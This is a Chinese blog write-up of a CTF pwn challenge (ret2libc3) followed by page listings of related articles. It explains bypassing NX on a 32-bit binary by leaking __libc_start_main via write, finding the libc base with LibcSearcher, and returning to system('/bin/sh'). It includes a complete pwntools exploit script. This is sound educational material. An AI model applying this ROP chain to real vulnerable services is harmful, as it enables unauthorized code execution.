暑期 pwn! pwn! pang! (二):ret2libc3 libc泄露,无system

最新推荐文章于 2024-06-30 20:54:26 发布
最新推荐文章于 2024-06-30 20:54:26 发布
阅读量726 收藏 9
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43342413/article/details/95303349
版权

不管这题是不是洪水猛兽,得先看了安全保护才知道:
在这里插入图片描述
源程序开启了栈堆不可执行保护,但可以用rop的方法绕过。
那就再看看源程序,发现仍是栈溢出,可以利用write函数溢出。
在这里插入图片描述
检查是否有"/bin/sh" 及system,发现并没有!!!

ROPgadget --binary pwn001 --string "/bin/sh"

gdb pwn001
b system

那么我们该如何得到system函数的地址呢?
system 函数属于 libc,而 libc.so 动态链接库中的函数之间相对偏移是固定的。
可以先泄露出自己程序中的某个函数,再与libc中的比对,找到相应的libc版本,就能得到现有程序的system地址了,此处需要用到LibcSearcher(其实github上也有一个更快的LibcSearcher2,但我不会用。。。)
那咱们再来理理思路:

  • 泄露 __libc_start_main 函数地址
  • 获取libc版本
  • 找到/bin/sh和system的地址
  • 再泄露一次,触发栈溢出执行system(’/bin/sh’)

exp如下:

from pwn import *
from LibcSearcher import *
sh=process('./pwn001')
elf=ELF('./pwn001')

write_plt=elf.plt['write']
libc_start_main_got=elf.got['__libc_start_main']
main=elf.symbols['main']

pld1='a'*0x28+'bbbb'+p32(write_plt)+p32(main)+p32(1)+p32(libc_start_main_got)+p32(4)
sh.send(pld1)
sh.recv(0x100)
libc_start_main_addr=u32(sh.recv(4))

libc=LibcSearcher('__libc_start_main',libc_start_main_addr)
#libc.add_condition('write',write_addr)
libcbase=libc_start_main_addr-libc.dump('__libc_start_main')
system_addr=libcbase+libc.dump('system')
binsh_addr=libcbase+libc.dump('str_bin_sh')
pld2='a'*0x28+'bbbb'+p32(system_addr)+0xdeadbeef+p32(binsh_addr)
sh.sendline(pld2)
sh.interactive()

My understanding:

  • 首先利用ELF可直接得到write函数,__libc_start_main函数,main函数的地址(no pie)
  • 第一次覆盖,先覆盖临时变量buf,再加上旧的ebp,所以先是’a’*0x28+‘bbbb’
  • 此时函数若正常执行则执行 pop eip这条指令,我们用write的地址覆盖这条指令的地址,让函数重新执行write
  • 为了调用write函数,先write的返回地址入栈,我们将这个返回地址覆盖成main(回到main,才能再执行一次read和write,为第二次覆盖创造条件),然后是write函数的形参入栈,这里就能把我们想要的地址打印出来,我们从libc_start_main开始,打印四个字节,即libc_start_main函数地址
  • 将我们构造的pld1发送出去,收到第一次执行write返回的0x100,这个没啥用,p.recv(0x100)一下,让它过了,重头戏是第二次执行收到的libc_start_main的地址,接收它
  • 好,我们可以利用泄露出来的libc_start_main的地址来和libc库中的这个函数进行比较,得到对应的libc版本
  • libc.dump(’__libc_start_main’)得到的是这个函数对libc基址的偏移,所以我们要得到libc基址的话就得用已知的函数地址减去偏移,得到基址即libcbase
  • 分别从libc中dump出system 和str_bin_sh 的偏移,加上基址,就是我们所需要的system("/bin/sh")的地址
  • 构造pld2,再次覆盖临时变量,让其返回到system,system的返回可以不用管了,所以直接用无效的0xdeadbeef,再传入system的参数,/bin/sh
  • o了

理是这个理,但如果LibcSearcher一下发现没有库能匹配就比较醉。

Tom Li
关注
ret2libc3地址泄露--pwn
weixin_44642009的博客
03-17 2784
练习三–ret2libc3地址泄露 在此实验前,我们从简到难实验了ret2libc1,ret2libc2两个实验,对getshell有了一定了解,基本学会了如何在有无system及/bin/sh函数的情况下获取权限,在此以实验的名为pwn的可执行文件为入手点,进行getshell。 首先,对ret2libc3可执行文件进行检测, checksec ret2libc3 结果如图: 发现其不存...
pwn ——ret2libc3
qq_41696518的博客
07-06 838
ret2libc3
pwn学习-ret2libc3
最新发布
Sa1nZen的博客
06-30 480
pwn学习-ret2libc3
基本ROP之ret2libc3
至臻求学,胸怀云月
02-15 5279
ret2libc思路 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址。 ret2libc通常可以分为下面这几类: 程序中自身就含有system函数和"/bin/sh"字符串 程序中自身就有s...
ret2libc2pwn 入门题
02-11
pwn 入门题
PWN篇:ret2libc
weixin_44644249的博客
01-28 448
PWN篇:ret2libc 源码 #include void vuln_func(){ char buf[128]; read(STDIN_FILENO,buf,256); } int main(int argc,char* argv[]){ vuln_func(); write(STDOUT_FILENO,"hello world!\n",13); } 很明显vuln为溢出函数 编译 gcc -m32 -fno-stack-protector -no-pie -z execstack tes
PWN基础16:Ret2Libc 32位实例
prettyX的博客
07-21 1108
这节我们研究的源码 //L16.c #include <stdio.h> char buf2[10]="ret2libc is good"; void vul() { char buf[10]; gets(buf); } void main() { write(1,"hello",5); vul(); }
PWN基础17:Ret2Libc 64位实例
prettyX的博客
07-24 4462
复现一下Ret2Libc 32位下的内存布局 针对这张图,我们在上一节做了细致的分析 32位的调用方式 32位系统中调用函数的方式:栈传递参数 构造函数调用将参数和返回地址放在栈上 构造执行write(1,buf2,20)后,再返回main函数 64位的调用方式 64位系统中使用寄存器传递参数:rdi、rsi、rdx、rcx、r8、r9(1-6个参数) 这节课,我们研究的源码 #include <stdio.h> char buf2[10]="ret2libc is goo
从零开始学逆向:理解ret2libc-3
weixin_44626085的博客
02-20 1507
题目下载链接:https://pan.baidu.com/s/1wk3JFQBHgVZ0vjfnQk60Ug 提取码:0000。
适合新手的ret2libc3之路
Vicl1fe的博客
05-29 3937
rop之libc3 做了一下这道题,感觉收获蛮大,写一篇博客,也方便自己记忆。 题目链接:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop/#3 参考链接:https://www.jianshu.com/p/5525dde00053 好了回归正题,首先拿到这个题目,ida打开按f5查看伪代码,看到了高危函数...
level3学习ret2libc
TedLau的博客
04-11 318
0x00 常规文件检查 是一个32位的开启了堆栈不可执行的ELF文件。 0x10 ida打开分析文件 ​ 在左侧的function处并没有发现system函数,但是有一个vulnerable_function, 打开main函数,f5反汇编后可以看到如下图所示的内容,即调用了vulnerable函数 打开vul函数可以发现它使用write函数先输出了一句话,于是我们可以尝试通过泄漏write函数的...
pwn入门:基本栈溢出之ret2libc详解(以32位+64位程序为例)
Bossfrank的博客
12-08 7086
本文详解了pwn题目中ret2libc的解题思路。简要介绍了plt表和got表的意义以及Linux中的延迟绑定技术,并通过32位和64位的两个具体题目具体的介绍了解pwn题的完整过程。
/system/bin/sh: disable-verity: not found 的解决方案
一位热心网友的博客
06-13 1913
虽然报错提示的路径是/system/bin/sh,但实际上这个命令依旧属于adb.exe这个程序,是windows端的adb.exe中没有这个命令可用。 找到问题的原因后,我从其他人电脑上拷贝了一个adb.exe过来就解决了这个报错。 最后将有disable-verity命令和没有disable-verity命令的adb程序一起提供给大家,大家可以自行测试。
PWN学习】如何获取libc基址
Morphy_Amo的博客
12-09 8429
在解pwn题的时候,如果程序中没有可以获得shell的函数,通常会通过got表中调用函数来获取libc基址,然后通过libc获取要用的system函数和binsh字符。
ROP-基础-ret2libc3
ATFWUS的博客
02-29 2146
文件下载地址: 链接:https://pan.baidu.com/s/1IMZt9WIlXDZBX2J-hoCyNA 提取码:jrsx 0x01.分析 checksec: Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enab...
pwn基本ROP——ret2libc
turtlesd的博客
04-26 2385
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
pwn ret2libc
清霂的博客
02-04 495
目录1.攻防世界 level32.buu babyrop3.buu ciscn_2019_c_1 1.攻防世界 level3 把文件放到kali里面发现是一个压缩包(放入exeinfo里面也可以发现是压缩包),解压缩得到level3和libc.so文件 file checksec ida32 进入漏洞函数vunl(),发现有栈溢出漏洞 没有system函数和/bin/sh 题目提示了用libclibc.so是一个函数库(类似于C语言#include<iostream>的iostrea
__libc_start_main 是什么
CHOOOU的博客
08-10 3310
Name __libc_start_main – initialization routine Synopsis int __libc_start_main(int (main) (int, char , char ), int argc, char * ubp_av, void (init) (void), void (*fini) (void), void (*rtld_fini)...
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值